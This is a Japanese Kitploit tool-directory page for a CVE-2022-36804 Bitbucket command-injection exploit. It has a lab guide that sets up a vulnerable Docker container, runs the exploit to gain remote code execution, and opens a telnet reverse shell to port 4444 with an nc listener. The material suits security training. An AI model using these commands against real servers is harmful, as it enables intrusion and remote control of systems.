Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-36804 | Kitploit
ツール/GitHubGitHub/asepsaepdin/cve-2022-36804
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール学習と教育
GitHubasepsaepdin/cve-2022-36804

CVE-2022-36804

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-36804 - Atlassian Bitbucket Server and Data Center コマンドインジェクションの脆弱性

Python


⚠️ 教育および許可されたセキュリティ研究目的のみに使用してください

オリジナルエクスプロイト作成者

オリジナルのPoC作者である Walnut Security Services Pvt. Ltd に非常に感謝します。

説明

Atlassian Bitbucket Server and Data Center のバージョン 7.0.0 から 7.6.17 未満、7.7.0 から 7.17.10 未満、7.18.0 から 7.21.4 未満、8.0.0 から 8.0.3 未満、8.1.0 から 8.1.3 未満、8.2.0 から 8.2.2 未満、8.3.0 から 8.3.1 未満の複数のAPIエンドポイントでは、公開または非公開のBitbucketリポジトリに対する読み取り権限を持つリモート攻撃者が、悪意のあるHTTPリクエストを送信することで任意のコードを実行できる可能性があります。この脆弱性は、TheGrandPew 氏によって私たちのバグ報奨金プログラムを通じて報告されました。


手順ガイド

  1. まず、リポジトリをクローンします

    root@kitploit:~
    git clone https://github.com/asepsaepdin/CVE-2022-36804.git
    
  2. ディレクトリを変更します

    root@kitploit:~
    cd CVE-2022-36804
    
  3. 脆弱性コンテナをビルドします

    root@kitploit:~
    docker build -t CVE-2022-36804 .
    
  4. 一時コンテナを実行します

    root@kitploit:~
    docker run --rm -it --name CVE-2022-36804 CVE-2022-36804
    
  5. コンテナのIPアドレスを確認します

    root@kitploit:~
    docker inspect CVE-2022-36804 | grep "IPAddress"
    
  6. Atlassian Bitbucket をセットアップし、URL http://172.17.0.3:7990 を開いて新しい公開リポジトリを作成します

  7. リモートコード実行(RCE)を確認します

    root@kitploit:~
    python3 cve-2022-36804.py -u http://172.17.0.3:7990
    
  8. カスタマイズしたコマンド(cmd)でRCEを確認します

    root@kitploit:~
    python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id
    
  9. 攻撃者の視点では、リモートコード実行は対話型シェルへのアクセスを獲得するために極めて重要です。したがって、以下のコマンドを実行すると、攻撃者のシステムのポート 4444/tcp に対して、bash ベースの telnet リバースシェルが TCP 上で起動します。

    root@kitploit:~
    python3 cve-2022-36804.py -u http://172.17.0.3:7990 -c 'TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.1 4444 0<$TF | sh 1>$TF'
    
    root@kitploit:~
    nc -nlvp 4444
    

クレジット

  • https://github.com/walnutsecurity/cve-2022-36804
  • https://nvd.nist.gov/vuln/detail/cve-2022-36804
ツールをダウンロード